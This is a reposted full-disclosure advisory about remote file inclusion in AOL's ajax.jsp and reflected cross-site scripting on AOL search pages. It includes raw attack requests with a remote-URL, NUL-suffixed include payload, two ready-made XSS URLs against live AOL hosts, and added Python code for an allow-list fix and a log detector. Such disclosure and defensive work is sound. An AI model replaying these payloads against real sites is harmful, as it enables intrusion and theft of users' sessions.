AOL File Inclusion / Cross Site Scripting

CVE:               CVE-2011-4504
Category:          CWE-98
Price:             Not specified
Severity:          Medium
Author:            Unknown
Risk:              High
Exploitation Type: Remote
Date:              2018-10-22
CVSS:              CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
EPSS:              0.02192
EPSSP:             0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100193

Below is a copy:

AOL File Inclusion / Cross Site Scripting
*******************************


Time-Line vulnerability
------------------------

- Multiple security advisories sent
- No response
- No feedback
- Not fixed
- Another security advisory (and another...)
- No response, no feedback
- Full disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scripting

#Vendor: http://www.aol.com

#Author: Juan Carlos García (@secnight)

https://habemuscurso.blogspot.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers, publishers, and advertisers.

Founded in 1983 as Control Video Corporation, an online services company, by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or set up international versions of its services. AOL is headquartered at 770 Broadway in New York.


                                        (Wikipedia)

III-Proof Of Concept
------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


This script is vulnerable to file inclusion attacks. It appears that the script includes a file whose name is determined by user-supplied data, and that this data is not properly validated before being passed to the include function.



Affected items
----------------

/ajax.jsp (5)


The impact of this vulnerability
--------------------------------
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the web server.


How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where possible, it is recommended to make a list of accepted filenames and restrict the input to that list.
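The allow-list approach recommended above, as an added example in Python rather than the JSP the advisory concerns; this is not code from the advisory or from AOL. It keeps the /aol/main/modules/ prefix and the m/p parameter names seen in the quoted requests and error messages, while the allow-listed module names are constructed for illustration. The first function approximates the unvalidated concatenation the error message implies; the other two show the restricted version, which rejects URLs, traversal sequences, suffixes and control characters because none of them can ever equal an allow-listed name.

```python
"""Allow-list validation for an include-path parameter.

Added example, not code from the advisory or from AOL. The module root
'/aol/main/modules/' and the parameter names 'm' and 'p' are taken from the
error messages and requests quoted in the advisory; the module names in the
allow-list are constructed for illustration.
"""
from typing import Optional
from urllib.parse import unquote

MODULE_ROOT = "/aol/main/modules/"

# Constructed allow-list: the only module names the page may include.
ALLOWED_MODULES = frozenset({"dynamiclead", "dynamicleadslide", "main5"})


def vulnerable_include_path(user_value: str) -> str:
    """Approximates the pattern the advisory's error message implies: the
    decoded parameter is concatenated onto the module root with no
    validation, so a URL or any other string becomes part of the path."""
    return MODULE_ROOT + unquote(user_value)


def validate_module_name(user_value: str) -> Optional[str]:
    """Return the module name if it is on the allow-list, otherwise None.

    The value is percent-decoded once (as the container does for query
    parameters) and then compared against the allow-list. URLs, traversal
    sequences, file suffixes and anything carrying a control character
    never match and are rejected before a path is ever built.
    """
    decoded = unquote(user_value)
    # Belt and braces: a NUL or other control character in a file name is
    # never legitimate; reject it explicitly so the intent is visible.
    if any(ord(ch) < 0x20 for ch in decoded):
        return None
    if decoded not in ALLOWED_MODULES:
        return None
    return decoded


def safe_include_path(user_value: str) -> str:
    """Build the include path only from an allow-listed module name."""
    name = validate_module_name(user_value)
    if name is None:
        raise ValueError("module parameter rejected")
    return MODULE_ROOT + name


if __name__ == "__main__":
    # The raw value from the advisory's request, before the container decodes it.
    probe = ("http%3a%2f%2fsome-inexistent-website.acu%2f"
             "some_inexistent_file_with_long_name%3f%2500.jpg")
    print("vulnerable:", vulnerable_include_path(probe))
    print("validated :", validate_module_name(probe))
    print("safe      :", safe_include_path("dynamiclead"))
```

The allow-list does the real work; the control-character check only makes the rejection of NUL-terminated names explicit for readers of the code. Any equivalent servlet or JSP fix should also resolve the final path and confirm it still lies under the module root before including it.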


Attack details
-----------------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found: 

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response


HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive




Variant 1
-----------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found: 

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B; rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response

HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive


Variant 3
---------

URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found: 

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL encoded GET input p was set to http://some-inexistent website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found: 

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistentwebsite.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK

Cache-Control: max-age=5
Connection: Keep-Alive

Via: AOL-CACHE

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

test-timestamp: 1390300006644

Content-Type: text/javascript;charset=UTF-8

Content-Length: 142

Keep-Alive: timeout=5, max=100



Cross Site Scripting
*********************


http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E 
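For the defender, both findings in this advisory are visible in ordinary access logs: a remote URL arriving in the m or p parameter of /ajax.jsp, and a script tag arriving in s_chn on /aol/webhome. The following added example, which is not part of the advisory, scans constructed access-log lines for those indicators. It goes slightly beyond the page by also flagging ".." traversal and a NUL byte that survives a second percent-decode, the other usual markers of a file-inclusion probe (CWE-98). The parameter names and paths are the page's; the log lines and the client IP address are constructed.

```python
"""Log-side detection of the probe patterns quoted in the advisory.

Added example, not code from the advisory or from AOL. The parameter names
('m', 'p', 's_chn') and paths come from the advisory; every log line below is
constructed, using the documentation address 203.0.113.5.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory shows being used to build an include path.
INCLUDE_PARAMS = {"m", "p"}

# Request field of a common-log-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# A value that starts with a URL scheme, e.g. http:// or ftp://
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# An opening or closing script tag, tolerant of inserted whitespace
SCRIPT_RE = re.compile(r"<\s*/?\s*script", re.IGNORECASE)

# Constructed log lines: two benign requests and three probes whose query
# strings reuse the shapes shown in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Oct/2018:10:00:01 +0000] "GET /ajax.jsp?ajax=1&m=dynamiclead&p=dynamicleadslide HTTP/1.1" 200 130
203.0.113.5 - - [22/Oct/2018:10:00:02 +0000] "GET /ajax.jsp?ajax=1&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&p=dynamicleadslide HTTP/1.1" 200 130
203.0.113.5 - - [22/Oct/2018:10:00:03 +0000] "GET /ajax.jsp?ajax=1&m=dynamiclead&p=..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1" 404 0
203.0.113.5 - - [22/Oct/2018:10:00:04 +0000] "GET /aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 512
203.0.113.5 - - [22/Oct/2018:10:00:05 +0000] "GET /aol/webhome?s_chn=news HTTP/1.1" 200 512
"""


def classify_request(target: str) -> list:
    """Return a list of 'kind:param' findings for one request target.

    parse_qsl decodes each value once, as the servlet container would. A
    second unquote() is applied only to look for a NUL that was hidden by
    double encoding (%2500 -> %00 -> NUL); the allow-list fix never needs
    the second decode, but the detector wants to see through it.
    """
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        fully_decoded = unquote(value)
        if name in INCLUDE_PARAMS:
            if SCHEME_RE.match(value):
                findings.append(f"rfi:{name}")
            if ".." in value.replace("\\", "/").split("/"):
                findings.append(f"traversal:{name}")
            if "\x00" in fully_decoded:
                findings.append(f"nul:{name}")
        if SCRIPT_RE.search(fully_decoded):
            findings.append(f"xss:{name}")
    return findings


def scan_log(text: str) -> list:
    """Return (target, findings) for every log line that triggers a rule."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = classify_request(match.group("target"))
        if findings:
            hits.append((match.group("target"), findings))
    return hits


if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(", ".join(findings), "<-", target)
```

The rules are deliberately tied to the parameters the application uses for includes, so a URL in an unrelated parameter (a redirect target, say) does not raise the file-inclusion alarm; the script-tag rule, by contrast, applies to every parameter because reflection can happen anywhere.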


IV-Authors:
-----------
Juan Carlos García @secnight


LEGAL NOTICES
--------------

The Author accepts no responsibility for any damage caused by the use or misuse of this information.

Copyright ©2024 Exploitalert.
